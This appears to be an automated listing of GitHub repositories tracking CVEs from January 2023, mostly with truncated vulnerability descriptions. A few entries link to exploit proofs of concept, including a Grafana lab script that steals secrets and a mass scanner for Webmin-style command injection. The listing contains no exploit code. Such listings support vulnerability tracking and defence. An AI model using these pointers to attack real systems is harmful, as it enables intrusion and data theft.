**A vulnerability, which was classified as critical, has been found in SourceCodester Online Tours & Travels Management System 1.0. This issue affects some unknown processing of the file admin/practice_pdf.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit h CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0560](https://github.com/Live-Hack-CVE/CVE-2023-0560) create time: 2023-01-28T19:42:52Z

**CVE-2022-23935 exploit PoC exiftool version 12.37** : [dpbe32/CVE-2022-23935-PoC-Exploit](https://github.com/dpbe32/CVE-2022-23935-PoC-Exploit) create time: 2023-01-28T18:04:05Z

**This script implements a lab automation where I exploit CVE-2021-43798 to steal user secrets and then gain privileges on a Linux system.** : [mauricelambert/LabAutomationCVE-2021-43798](https://github.com/mauricelambert/LabAutomationCVE-2021-43798) create time: 2023-01-28T11:12:22Z

**Improper conditions check in the Linux kernel driver for the Intel(R) FPGA SDK for OpenCL(TM) Pro Edition before version 19.4 may allow an authenticated user to potentially enable denial of service via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-11165](https://github.com/Live-Hack-CVE/CVE-2019-11165) create time: 2023-01-28T06:35:35Z

**When using the cd4pe::root_configuration task to configure a Continuous Delivery for PE installation, the root user’s username and password were exposed in the job’s Job Details pane in the PE console. These issues have been resolved in version 1.2.1 of the puppetlabs/cd4pe module. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-10695](https://github.com/Live-Hack-CVE/CVE-2019-10695) create time: 2023-01-28T06:35:32Z

**Octeth Oempro 4.7 and 4.8 allow SQL injection. The parameter CampaignID in Campaign.Get is vulnerable. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19740](https://github.com/Live-Hack-CVE/CVE-2019-19740) create time: 2023-01-28T06:35:28Z

**lgc.c in Lua 5.4.0 mishandles the interaction between barriers and the sweep phase, leading to a memory access violation involving collectgarbage. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-24371](https://github.com/Live-Hack-CVE/CVE-2020-24371) create time: 2023-01-28T06:35:43Z

**OCS Inventory NG 2.7 allows Remote Command Execution via shell metacharacters to require/commandLine/CommandLine.php because mib_file in plugins/main_sections/ms_config/ms_snmp_config.php is mishandled in get_mib_oid. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14947](https://github.com/Live-Hack-CVE/CVE-2020-14947) create time: 2023-01-28T06:35:39Z

**An issue was discovered with assimp 5.1.4, a use after free occurred in function ColladaParser::ExtractDataObjectFromChannel in file /code/AssetLib/Collada/ColladaParser.cpp. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45748](https://github.com/Live-Hack-CVE/CVE-2022-45748) create time: 2023-01-28T06:35:17Z

**Use of uninitialized variable in function gen_eth_recv in GNS3 dynamips 0.2.21. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47012](https://github.com/Live-Hack-CVE/CVE-2022-47012) create time: 2023-01-28T06:35:13Z

**This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PGM files. Crafted data CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42410](https://github.com/Live-Hack-CVE/CVE-2022-42410) create time: 2023-01-28T06:35:10Z

**This vulnerability allows remote attackers to disclose sensitive information on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. Craf CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42409](https://github.com/Live-Hack-CVE/CVE-2022-42409) create time: 2023-01-28T06:35:06Z

**MariaDB Server before 10.3.34 thru 10.9.3 is vulnerable to Denial of Service. It is possible for function spider_db_mbase::print_warnings to dereference a null pointer. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47015](https://github.com/Live-Hack-CVE/CVE-2022-47015) create time: 2023-01-28T06:35:02Z

**This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of TIF files. Crafted data CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42417](https://github.com/Live-Hack-CVE/CVE-2022-42417) create time: 2023-01-28T06:34:51Z

**This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of TIF files. Crafted data CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42416](https://github.com/Live-Hack-CVE/CVE-2022-42416) create time: 2023-01-28T06:34:48Z

**This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JP2 files. Crafted data CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42415](https://github.com/Live-Hack-CVE/CVE-2022-42415) create time: 2023-01-28T06:34:44Z

**This vulnerability allows remote attackers to disclose sensitive information on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42414](https://github.com/Live-Hack-CVE/CVE-2022-42414) create time: 2023-01-28T06:34:41Z

**This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of TIF files. Crafted data CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42423](https://github.com/Live-Hack-CVE/CVE-2022-42423) create time: 2023-01-28T06:34:38Z

**This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of TIF files. Crafted data CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42421](https://github.com/Live-Hack-CVE/CVE-2022-42421) create time: 2023-01-28T06:34:33Z

**This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of TIF files. Crafted data CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42420](https://github.com/Live-Hack-CVE/CVE-2022-42420) create time: 2023-01-28T06:34:30Z

**This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of TIF files. Crafted data CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42419](https://github.com/Live-Hack-CVE/CVE-2022-42419) create time: 2023-01-28T06:34:26Z

**This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of TIF files. The issue re CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42418](https://github.com/Live-Hack-CVE/CVE-2022-42418) create time: 2023-01-28T06:34:23Z

**Cross Site Scripting (XSS) vulnerability in InventorySystem thru commit e08fbbe17902146313501ed0b5feba81d58f455c (on Apr 23, 2021) via edit_store_name and edit_active inputs in file InventorySystem.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23014](https://github.com/Live-Hack-CVE/CVE-2023-23014) create time: 2023-01-28T06:35:25Z

**Cross Site Scripting (XSS) vulnerability in Ecommerce-CodeIgniter-Bootstrap thru commit d5904379ca55014c5df34c67deda982c73dc7fe5 (on Dec 27, 2022), allows attackers to execute arbitrary code via the languages and trans_load parameters in file add_product.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23010](https://github.com/Live-Hack-CVE/CVE-2023-23010) create time: 2023-01-28T06:35:21Z

**Cross Site Scripting (XSS) vulnerability in craigrodway classroombookings 2.6.4 allows attackers to execute arbitrary code or other unspecified impacts via the input bgcol in file Weeks.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23012](https://github.com/Live-Hack-CVE/CVE-2023-23012) create time: 2023-01-28T06:34:59Z

**A privilege escalation vulnerability was identified in Nessus versions 8.10.1 through 8.15.8 and 10.0.0 through 10.4.1. An authenticated attacker could potentially execute a specially crafted file to obtain root or NT AUTHORITY / SYSTEM privileges on the Nessus host. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0101](https://github.com/Live-Hack-CVE/CVE-2023-0101) create time: 2023-01-28T06:34:54Z

**This is a script that exploits a known vulnerability (CVE-2019-15107) in web applications, allowing an attacker to inject commands on the target server. It takes a file containing a list of target URLs as input and attempts to find vulnerable URLs. It should only be used for security testing and with proper authorization.** : [Pichuuuuu/verbose_happiness](https://github.com/Pichuuuuu/verbose_happiness) create time: 2019-12-22T15:43:59Z

**A SQL injection issue in the gVectors wpDiscuz plugin 5.3.5 and earlier for WordPress allows remote attackers to execute arbitrary SQL commands via the order parameter of a wpdLoadMoreComments request. (No 7.x versions are affected.) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13640](https://github.com/Live-Hack-CVE/CVE-2020-13640) create time: 2023-01-28T02:03:04Z

**An issue was discovered in the jsrsasign package through 8.0.18 for Node.js. It allows a malleability in ECDSA signatures by not checking overflows in the length of a sequence and '0' characters appended or prepended to an integer. The modified signatures are verified as valid. This could have a security-relevant impac CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14966](https://github.com/Live-Hack-CVE/CVE-2020-14966) create time: 2023-01-28T02:03:00Z

**An issue was discovered in the jsrsasign package before 8.0.18 for Node.js. Its RSA PKCS1 v1.5 decryption implementation does not detect ciphertext modification by prepending '\0' bytes to ciphertexts (it decrypts modified ciphertexts without error). An attacker might prepend these bytes with the goal of triggering mem CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14967](https://github.com/Live-Hack-CVE/CVE-2020-14967) create time: 2023-01-28T02:02:57Z

**Grafana is an open-source platform for monitoring and observability. Prior to versions 8.5.16 and 9.2.8, malicious user can create a snapshot and arbitrarily choose the `originalUrl` parameter by editing the query, thanks to a web proxy. When another user opens the URL of the snapshot, they will be presented with the r CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39324](https://github.com/Live-Hack-CVE/CVE-2022-39324) create time: 2023-01-28T02:03:35Z

**Grafana is an open-source platform for monitoring and observability. Starting with the 8.1 branch and prior to versions 8.5.16, 9.2.10, and 9.3.4, Grafana had a stored XSS vulnerability affecting the core plugin GeoMap. The stored XSS vulnerability was possible because SVG files weren't properly sanitized and allowed a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23552](https://github.com/Live-Hack-CVE/CVE-2022-23552) create time: 2023-01-28T02:03:32Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was in a CNA pool that was not assigned to any issues during 2023. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0047](https://github.com/Live-Hack-CVE/CVE-2023-0047) create time: 2023-01-28T02:03:39Z

**Sanitize is an allowlist-based HTML and CSS sanitizer. Versions 5.0.0 and later, prior to 6.0.1, are vulnerable to Cross-site Scripting. When Sanitize is configured with a custom allowlist that allows `noscript` elements, attackers are able to include arbitrary HTML, resulting in XSS (cross-site scripting) or other und CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23627](https://github.com/Live-Hack-CVE/CVE-2023-23627) create time: 2023-01-28T02:03:29Z

**Discourse is an open-source discussion platform. Prior to version 3.0.1 on the `stable` branch and version 3.1.0.beta2 on the `beta` and `tests-passed` branches, someone can use the `exclude_tag param` to filter out topics and deduce which ones were using a specific hidden tag. This affects any Discourse site using hid CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23624](https://github.com/Live-Hack-CVE/CVE-2023-23624) create time: 2023-01-28T02:03:25Z

**Discourse is an open-source discussion platform. Prior to version 3.0.1 on the `stable` branch and version 3.1.0.beta2 on the `beta` and `tests-passed` branches, a malicious user can cause a regular expression denial of service using a carefully crafted user agent. This issue is patched in version 3.0.1 on the `stable` CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23621](https://github.com/Live-Hack-CVE/CVE-2023-23621) create time: 2023-01-28T02:03:22Z

**Discourse is an open-source discussion platform. Prior to version 3.0.1 on the `stable` branch and 3.1.0.beta2 on the `beta` and `tests-passed` branches, the contents of latest/top routes for restricted tags can be accessed by unauthorized users. This issue is patched in version 3.0.1 on the `stable` branch and 3.1.0.b CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23620](https://github.com/Live-Hack-CVE/CVE-2023-23620) create time: 2023-01-28T02:03:18Z

**OpenMage LTS is an e-commerce platform. Versions prior to 19.4.22 and 20.0.19 contain an infinite loop in malicious code filter in certain conditions. Versions 19.4.22 and 20.0.19 have a fix for this issue. There are no known workarounds. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23617](https://github.com/Live-Hack-CVE/CVE-2023-23617) create time: 2023-01-28T02:03:15Z

**Discourse is an open-source discussion platform. Prior to version 3.0.1 on the `stable` branch and 3.1.0.beta2 on the `beta` and `tests-passed` branches, when submitting a membership request, there is no character limit for the reason provided with the request. This could potentially allow a user to flood the database CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23616](https://github.com/Live-Hack-CVE/CVE-2023-23616) create time: 2023-01-28T02:03:11Z

**wire-server provides back end services for Wire, a team communication and collaboration platform. Prior to version 2022-12-09, every member of a Conversation can remove a Bot from a Conversation due to a missing permissions check. Only Conversation admins should be able to remove Bots. Regular Conversations are not all CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22737](https://github.com/Live-Hack-CVE/CVE-2023-22737) create time: 2023-01-28T02:03:07Z

**A path traversal vulnerability exists in Sage FRP 1000 before November 2019. This allows remote unauthenticated attackers to access files outside of the web tree via a crafted URL. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-25053](https://github.com/Live-Hack-CVE/CVE-2019-25053) create time: 2023-01-27T23:52:45Z

**An issue was discovered in NLnet Labs Routinator 0.1.0 through 0.7.1. It allows remote attackers to bypass intended access restrictions or to cause a denial of service on dependent routing systems by strategically withholding RPKI Route Origin Authorisation ".roa" files or X509 Certificate Revocation List files from th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-17366](https://github.com/Live-Hack-CVE/CVE-2020-17366) create time: 2023-01-27T23:53:13Z

**D-Link DIR_878_FW1.30B08 was discovered to contain a command injection vulnerability via the component /setnetworksettings/IPAddress. This vulnerability allows attackers to escalate privileges to root via a crafted payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48107](https://github.com/Live-Hack-CVE/CVE-2022-48107) create time: 2023-01-27T23:53:09Z

**D-Link DIR_878_FW1.30B08 was discovered to contain a command injection vulnerability via the component /SetNetworkSettings/SubnetMask. This vulnerability allows attackers to escalate privileges to root via a crafted payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48108](https://github.com/Live-Hack-CVE/CVE-2022-48108) create time: 2023-01-27T23:52:52Z

**Wire web-app is part of Wire communications. Versions prior to 2022-11-02 are subject to Improper Handling of Exceptional Conditions. In the wire-webapp, certain combinations of Markdown formatting can trigger an unhandled error in the conversion to HTML representation. The error makes it impossible to display the affe CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39380](https://github.com/Live-Hack-CVE/CVE-2022-39380) create time: 2023-01-27T23:52:49Z

**An info leak issue was identified in all versions of GitLab EE from 13.7 prior to 15.4.6, 15.5 prior to 15.5.5, and 15.6 prior to 15.6.1 which exposes user email id through webhook payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4255](https://github.com/Live-Hack-CVE/CVE-2022-4255) create time: 2023-01-27T23:52:30Z

**In Gitlab EE/CE before 15.6.1, 15.5.5 and 15.4.6 using a branch with a hexadecimal name could override an existing hash. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4205](https://github.com/Live-Hack-CVE/CVE-2022-4205) create time: 2023-01-27T23:52:27Z

**A blind SSRF in GitLab CE/EE affecting all from 11.3 prior to 15.4.6, 15.5 prior to 15.5.5, and 15.6 prior to 15.6.1 allows an attacker to connect to local addresses when configuring a malicious GitLab Runner. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4201](https://github.com/Live-Hack-CVE/CVE-2022-4201) create time: 2023-01-27T23:52:23Z

**A stored cross-site scripting (XSS) vulnerability in /index.php?page=help of Revenue Collection System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into sent messages. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46968](https://github.com/Live-Hack-CVE/CVE-2022-46968) create time: 2023-01-27T23:52:20Z

**There is a stored cross-site scripting vulnerability in Pandora FMS v765 in the network maps editing functionality. An attacker could modify a network map, including on purpose the name of an XSS payload. Once created, if a user with admin privileges clicks on the edited network maps, the XSS payload will be executed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43980](https://github.com/Live-Hack-CVE/CVE-2022-43980) create time: 2023-01-27T23:52:17Z

**There is a Path Traversal that leads to a Local File Inclusion in Pandora FMS v764. A function is called to check that the parameter that the user has inserted does not contain malicious characteres, but this check is insufficient. An attacker could insert an absolute path to overcome the heck, thus being able to inclu CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43979](https://github.com/Live-Hack-CVE/CVE-2022-43979) create time: 2023-01-27T23:52:13Z

**There is an improper authentication vulnerability in Pandora FMS v764. The application verifies that the user has a valid session when he is not trying to do a login. Since the secret is static in generatePublicHash function, an attacker with knowledge of a valid session can abuse this in order to pass the authenticati CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43978](https://github.com/Live-Hack-CVE/CVE-2022-43978) create time: 2023-01-27T23:52:10Z

**Italtel NetMatch-S CI 5.2.0-20211008 allows Multiple Reflected/Stored XSS issues under NMSCIWebGui/j_security_check via the j_username parameter, or NMSCIWebGui/actloglineview.jsp via the name or actLine parameter. An attacker leveraging this vulnerability could inject arbitrary JavaScript. The payload would then be tr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39813](https://github.com/Live-Hack-CVE/CVE-2022-39813) create time: 2023-01-27T23:52:06Z

**Italtel NetMatch-S CI 5.2.0-20211008 allows Absolute Path Traversal under NMSCI-WebGui/SaveFileUploader. An unauthenticated user can upload files to an arbitrary path. An attacker can change the uploadDir parameter in a POST request (not possible using the GUI) to an arbitrary directory. Because the application does no CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39812](https://github.com/Live-Hack-CVE/CVE-2022-39812) create time: 2023-01-27T23:52:03Z

**Italtel NetMatch-S CI 5.2.0-20211008 has incorrect Access Control under NMSCI-WebGui/advancedsettings.jsp and NMSCIWebGui/SaveFileUploader. By not verifying permissions for access to resources, it allows an attacker to view pages that are not allowed, and modify the system configuration, bypassing all controls (without CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39811](https://github.com/Live-Hack-CVE/CVE-2022-39811) create time: 2023-01-27T23:51:59Z

**The Quick Restaurant Menu plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on its AJAX actions in versions up to, and including, 2.0.2. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke those actions intended for admini CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0555](https://github.com/Live-Hack-CVE/CVE-2023-0555) create time: 2023-01-27T23:53:06Z

**The Quick Restaurant Menu plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.0.2. This is due to missing or incorrect nonce validation on its AJAX actions. This makes it possible for unauthenticated attackers to update menu items, via forged request granted they can tri CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0554](https://github.com/Live-Hack-CVE/CVE-2023-0554) create time: 2023-01-27T23:53:02Z

**The Quick Restaurant Menu plugin for WordPress is vulnerable to Stored Cross-Site Scripting via its settings parameters in versions up to, and including, 2.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0553](https://github.com/Live-Hack-CVE/CVE-2023-0553) create time: 2023-01-27T23:52:59Z

**The Quick Restaurant Menu plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 2.0.2. This is due to the fact that during menu item deletion/modification, the plugin does not verify that the post ID provided to the AJAX action is indeed a menu item. This makes it poss CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0550](https://github.com/Live-Hack-CVE/CVE-2023-0550) create time: 2023-01-27T23:52:56Z

**The ContentStudio plugin for WordPress is vulnerable to authorization bypass due to an unsecure token check that is susceptible to type juggling in versions up to, and including, 1.2.5. This makes it possible for unauthenticated attackers to execute functions intended for use by users with proper API keys. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0558](https://github.com/Live-Hack-CVE/CVE-2023-0558) create time: 2023-01-27T23:52:41Z

**The ContentStudio plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 1.2.5. This could allow unauthenticated attackers to obtain a nonce needed for the creation of posts. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0557](https://github.com/Live-Hack-CVE/CVE-2023-0557) create time: 2023-01-27T23:52:37Z

**The ContentStudio plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on several functions in versions up to, and including, 1.2.5. This makes it possible for unauthenticated attackers to obtain the blog metadata (via the function cstu_get_metadata) that includes the plugin's co CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0556](https://github.com/Live-Hack-CVE/CVE-2023-0556) create time: 2023-01-27T23:52:34Z

**A buffer overflows exists in the psnotifyd application of the Pharos PopUp printer client version 9.0. A specially crafted packet can be sent to the victim's computer and can lead to a heap based buffer overflow resulting in potential remote code execution. This client is always listening, has root privileges, and requ CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-2788](https://github.com/Live-Hack-CVE/CVE-2017-2788) create time: 2023-01-27T21:40:01Z

**An exploitable integer overflow vulnerability exists in the JPEG 2000 image parsing functionality of freedesktop.org Poppler 0.53.0. A specially crafted PDF file can lead to an integer overflow causing out of bounds memory overwrite on the heap resulting in potential arbitrary code execution. To trigger this vulnerabil CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-2820](https://github.com/Live-Hack-CVE/CVE-2017-2820) create time: 2023-01-27T21:39:58Z

**An exploitable code execution vulnerability exists in the XCF image rendering functionality of SDL2_image-2.0.2. A specially crafted XCF image can cause a heap overflow resulting in code execution. An attacker can display a specially crafted image to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-14448](https://github.com/Live-Hack-CVE/CVE-2017-14448) create time: 2023-01-27T21:39:54Z

**In CISOfy Lynis 2.x through 2.7.5, the license key can be obtained by looking at the process list when a data upload is being performed. This license can be used to upload data to a central Lynis server. Although no data can be extracted by knowing the license key, it may be possible to upload the data of additional sc CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13033](https://github.com/Live-Hack-CVE/CVE-2019-13033) create time: 2023-01-27T21:40:35Z

**XSS exists in PRTG Network Monitor 20.1.56.1574 via crafted map properties. An attacker with Read/Write privileges can create a map, and then use the Map Designer Properties screen to insert JavaScript code. This can be exploited against any user with View Maps or Edit Maps access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14073](https://github.com/Live-Hack-CVE/CVE-2020-14073) create time: 2023-01-27T21:40:38Z

**In all versions of Eclipse Web Tools Platform through release 3.18 (2020-06), XML and DTD files referring to external entities could be exploited to send the contents of local files to a remote server when edited or validated, even when external entity resolution is disabled in the user preferences. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-17637](https://github.com/Live-Hack-CVE/CVE-2019-17637) create time: 2023-01-27T21:40:31Z

**The Kubernetes kube-apiserver in versions v1.6-v1.15, and versions prior to v1.16.13, v1.17.9 and v1.18.6 are vulnerable to an unvalidated redirect on proxied upgrade requests that could allow an attacker to escalate privileges from a node compromise to a full cluster compromise. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8559](https://github.com/Live-Hack-CVE/CVE-2020-8559) create time: 2023-01-27T21:40:28Z

**The Kubernetes kubelet component in versions 1.1-1.16.12, 1.17.0-1.17.8 and 1.18.0-1.18.5 do not account for disk usage by a pod which writes to its own /etc/hosts file. The /etc/hosts file mounted in a pod by kubelet is not included by the kubelet eviction manager when calculating ephemeral storage usage by a pod. If CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8557](https://github.com/Live-Hack-CVE/CVE-2020-8557) create time: 2023-01-27T21:40:24Z

**Advantech WebAccess HMI Designer, Versions 2.1.9.31 and prior. Multiple heap-based buffer overflow vulnerabilities may be exploited by opening specially crafted project files that may overflow the heap, which may allow remote code execution, disclosure/modification of information, or cause the application to crash. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-16207](https://github.com/Live-Hack-CVE/CVE-2020-16207) create time: 2023-01-27T21:40:20Z

**asyncpg before 0.21.0 allows a malicious PostgreSQL server to trigger a crash or execute arbitrary code (on a database client) via a crafted server response, because of access to an uninitialized pointer in the array data decoder. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-17446](https://github.com/Live-Hack-CVE/CVE-2020-17446) create time: 2023-01-27T21:40:16Z

**Appweb before 7.2.2 and 8.x before 8.1.0, when built with CGI support, mishandles an HTTP request with a Range header that lacks an exact range. This may result in a NULL pointer dereference and cause a denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15689](https://github.com/Live-Hack-CVE/CVE-2020-15689) create time: 2023-01-27T21:40:12Z

**In Elasticsearch before 7.9.0 and 6.8.12 a field disclosure flaw was found when running a scrolling search with Field Level Security. If a user runs the same query another more privileged user recently ran, the scrolling search can leak fields that should be hidden. This could result in an attacker gaining additional p CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7019](https://github.com/Live-Hack-CVE/CVE-2020-7019) create time: 2023-01-27T21:40:09Z

**An issue was discovered in the jsrsasign package before 8.0.17 for Node.js. Its RSASSA-PSS (RSA-PSS) implementation does not detect signature manipulation/modification by prepending '\0' bytes to a signature (it accepts these modified signatures as valid). An attacker can abuse this behavior in an application by creati CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14968](https://github.com/Live-Hack-CVE/CVE-2020-14968) create time: 2023-01-27T21:40:05Z

**AyaCMS v3.1.2 was discovered to contain a remote code execution (RCE) vulnerability via the component /admin/tpl_edit.inc.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48116](https://github.com/Live-Hack-CVE/CVE-2022-48116) create time: 2023-01-27T21:41:14Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32952](https://github.com/Live-Hack-CVE/CVE-2022-32952) create time: 2023-01-27T21:41:10Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32472](https://github.com/Live-Hack-CVE/CVE-2022-32472) create time: 2023-01-27T21:41:07Z

**This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. Crafted data CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42400](https://github.com/Live-Hack-CVE/CVE-2022-42400) create time: 2023-01-27T21:41:03Z

**This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. Crafted data CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42399](https://github.com/Live-Hack-CVE/CVE-2022-42399) create time: 2023-01-27T21:41:00Z

**This vulnerability allows remote attackers to disclose sensitive information on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of EMF files. Craf CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42407](https://github.com/Live-Hack-CVE/CVE-2022-42407) create time: 2023-01-27T21:40:55Z

**This vulnerability allows remote attackers to disclose sensitive information on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of EMF files. Craf CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42406](https://github.com/Live-Hack-CVE/CVE-2022-42406) create time: 2023-01-27T21:40:50Z

**This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of EMF files. The issue re CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42405](https://github.com/Live-Hack-CVE/CVE-2022-42405) create time: 2023-01-27T21:40:47Z

